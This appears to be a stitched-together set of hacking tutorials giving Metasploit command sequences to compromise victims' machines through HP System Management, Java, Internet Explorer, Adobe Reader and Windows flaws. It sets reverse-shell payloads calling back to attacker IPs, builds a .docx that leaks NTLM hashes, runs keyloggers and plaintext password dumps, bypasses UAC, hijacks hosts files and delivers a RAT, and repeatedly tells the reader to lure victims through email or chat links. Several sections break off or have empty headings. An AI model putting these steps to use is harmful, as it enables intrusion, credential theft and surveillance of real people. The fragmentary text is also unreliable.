There are two modules available for exploitation of hp system management.

(1)HP System Management Anonymous Access Code Execution

This module exploits an anonymous remote code execution on HP System Management 7.1.1 and earlier. The vulnerability exists when handling the iprange parameter on a request against /proxy/DataValidation. In order to work HP System Management must be configured with Anonymous access enabled.


Exploit Targets

    0 - HP System Management 7.1.1 - Linux (CentOS) (default)
    1 - HP System Management 6.3.0 - Linux (CentOS)

msfconsole
msf > use exploit/linux/http/hp_system_management
msf exploit(hp_system_management) > show payloads
msf exploit(hp_system_management) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(hp_system_management) > set LHOST [MY IP ADDRESS]
msf exploit(hp_system_management) > set RHOST [TARGET IP]
msf exploit(hp_system_management) > exploit

(2)HP System Management Homepage JustGetSNMPQueue Command Injection

This module exploits a vulnerability found in HP System Management Homepage. By supplying a specially crafted HTTP request, it is possible to control the 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc), which will be used in a exec() function. This results in arbitrary code execution under the context of SYSTEM

Exploit Targets

    0 - Windows (default)

msfconsole
msf > use exploit/windows/http/hp_sys_mgmt_exec
msf exploit(hp_sys_mgmt_exec) > show payloads
msf exploit(hp_sys_mgmt_exec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(hp_sys_mgmt_exec) > set LHOST [MY IP ADDRESS]
msf exploit(hp_sys_mgmt_exec) > set RHOST [TARGET IP]
msf exploit(hp_sys_mgmt_exec) > exploit

This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes the auxiliary/server/capture/smb module can be used.

First Hack the Victim PC Using Metaspolit (click here)

msfconsole

use auxiliary/docx/word_unc_injector

msf exploit (word_unc_injector)>set lhost 192.168.1.2 (IP of Local Host)

msf exploit (word_unc_injector)>exploit

Now we successfully generate the malicious docx File, it will stored on your local computer

/root/.msf4/local/msf.docx

Now use ‘upload ‘command to upload the msf.docx in victim pc using

Upload /root/.msf4/local/msf.docx.

Now use auxiliary/server/capture/smb

msf exploit (smb)>run

When victim open your msf.doc files you will get the password hash after get the victim password hashes, you can try to connect to another victim use the same password

use exploit/windows/browser/java_jre17_jmxbean_2
msf exploit (java_jre17_jmxbean_2)>set payload java/shell_reverse_tcp
Now an URL you should give to your victim http://192.168.1.7:8080/

(A)Hide File in victim `s P.C:-

After successfully got meterpreter sessions you can hide any file in victim `s P.C. Type following attribute.

attrib +h +r +s drivename:/Foldername

For example you want to hide folder name “songs” in F drive then just type following command in your terminal.

shell

attrib +h +r +s F:/songs

For unhidden file attrib -h -r -s F:/songs

(B)Get passwords of remote windows P.C:-

After getting meterpreter session type ps command it will display list of running process. Now we should migrate meterpreter session to any running process with their process i.d.

In this example we will migrate meterpreter session to winlogon.exe which process i.d. Is 600.

Type following command in your terminal.

migrate 600

Keyscan_start – to start the keylogger

Keyscan_dump – to print captured keystrokes

Keyscan_stop – to stop the keylogger

(C)Remote Windows password in plain text :-

Type following command in your meterpreter session.

Upload /pentest/passwords/wce/wce.exe

shell

wce.exe -w

(D)Lock Folder in Remote P.C. :-

After getting meterpreter  session type following command.

Cacls (Folder Name) /e /p everyone:n

This will lock your folder.

For unlock

Cacls (Folder Name) /e /p everyone:f

Here is more method of post exploitation.

This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerable client to access the IP of this system as an SMB  server. This can be accomplished by embedding a UNC path (\HOST\share\something) into a web page if the target is using Internet Explorer, or a Word 
(4)set SRVHOST I.P. of local machine 

Today we will edit hot file of the Remote P.C which has been compromised. By editing Host file you can Redirect any website to any I.P address. Absolutely we will use metasploit.

(1)Hack remote p.c .(How to hack Remote P.C.?)

(2)Now we will Bypass U.A.C. protection of windows.

(3)Open Terminal & type following code in terminal

msfconsole

use exploit/windows/local/bypassuac

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.6

set session 1

exploit

(4)Now we will edit host file.

msf >use post/windows/manage/injet_host

msf post(injet_host) >set domain www.google.com

msf post(injet_host) >set ip Your Desired I.P.

msf post(injet_host) >set session 2

msf post(injet_host) >exploit

This will Redirect google.com in victim p.c to your desired I.P.

RAT is Remote Administration tool , using RAT you can control Remote P.C. ,there are lots of software available for RAT , but they are made from hackers, there is possibility of back-door in that readily available software. So today we use RAT through Social engineering toolkit(SET).

(1)Open your terminal & type

cd /opt/set

./set

(2)update your set

(3)Now select option 3 which is Third party Modules

(4)Now select option 2 which is RATTE (Remote administration tool tommy edition).

(5)Enter I.P. Address of your computer to connect back

(6)Port RATTE Server should listen on [8080]: press enter

(7)Should RATTE be persistent [no|yes]?:yes

(8)Use specifix filename (ex. firefox.exe) [filename.exe or empty]?:cool.exe

(9) Payload has been exported to src/program_junk/ratteM.exe

(10)Now send your ratteM.exe files to victim, as soon as they download and open it

Start the ratteserver listener now [yes|no]:yes

(11)chose 1 option which is list client

(12)if the payload been executed successfully, then you will see a new session and the client details. Note down the session number. Enter the session you want to interact with:press 0 here

Now choose option2 “activate client”

Now you get menu with lots of menu. Select 1st option which is start shell.

Today we are going to use metasploit again. We can hack remote computer using java applet to run code outside send-box. This vulnerability is new. It` s applicable to java version 7 and earlier.

(1)To use this vulnerability first update your metasploit modules by runnig command msfupdate in your terminal

(2)Now after update type msfconsole

(3)type use exploit/multi/browser/java_jre17_jaxws

(4)set payload java/shell_reverse_tcp

(5)set lhost 223.232.185.97(your I.p)

(6)set srvhost 223.232.185.97(server I.p.)

(7)set uripath /

(8)exploit

Now an URL you should give to your victim http://223.232.185.97:8080/

Now send link to victim. When victim open your link, you have access of victim` s computer.

(9)type sessions -l

(10)the Session number to connect to the session. And Now Type sessions -i ID

Winenum

Checkvm

The most common use of msfpayload tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing a module.

msfpayload linux/x86/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 x > /root/Desktop/facebook

The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.

Requirement

This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.

Exploit Targets

Requirement

This module exploits heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than what is available on the heap (0×400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the msvcrt ROP to bypass DEP (Data Execution Prevention). Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Exploit Targets

Requirement

Attacker: metasploit

Victim PC: Windows XP

Open backtrack terminal type

msfconsole


Now type

use exploit/windows/browser/ms12_004_midi

Msf exploit (ms12_004_midi)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms12_004_midi)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ms12_004_midi)>set port 4444 (Port of Local PC)

Msf exploit (ms12_004_midi)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ms12_004_midi)>set srvport 80 (The local port to listen on default: 8080)

Msf exploit (ms12_004_midi)>set uripath salesreport (The Url to use for this exploit)

Msf exploit (ms12_004_midi)>exploit


Now an URL you should give to your victim http://192.168.1.4/salesreport

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

This module exploits vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Requirement

Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.

The attack has been aimed at dozens of other organizations, of whichAdobe Systems, Juniper NetworksandRackspacehave publicly confirmed that they were targeted. According to media reports,Yahoo,Symantec, Northrop Grumman, MorganStanley and DowChemicalwere also among the targets.

Exploit Targets

Web Browser: Internet Explorer 5, Internet Explorer 6, Internet Explorer 7, Internet Explorer 8

Operating System: Windows vista, windows 7, windows server 2008

Requirement

This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.
Exploit Targets

0 – Adobe Reader v9.0.0 (Windows XP SP3 English) (default)

1 – Adobe Reader v8.1.2 (Windows XP SP2 English)

Requirement

When the victim opens that link in their browser, immediately it will alert a dialog box about akonsong PDF .

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

This module exploits vulnerability in the Smart Independent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version is assumed to be vulnerable as well.

Exploit Targets

0 – Automatic (default)

Requirement

Victim PC: Windows XP

Open backtrack terminal type

msfconsole

use exploit/windows/browser/adobe_cooltype_sing

Msf exploit(adobe_cooltype_sing)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_cooltype_sing)>set lhost 192.168.1.3(IP of Local Host)

Msf exploit (adobe_cooltype_sing)>set srvhost 192.168.1.3(This must be an address on the local machine)

Msf exploit (adobe_cooltype_sing)>set uripathfinalreport(The Url to use for this exploit)

Msf exploit (adobe_cooltype_sing)>exploit

Now an URL you should give to your victim http://192.168.1.3/finalreport

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“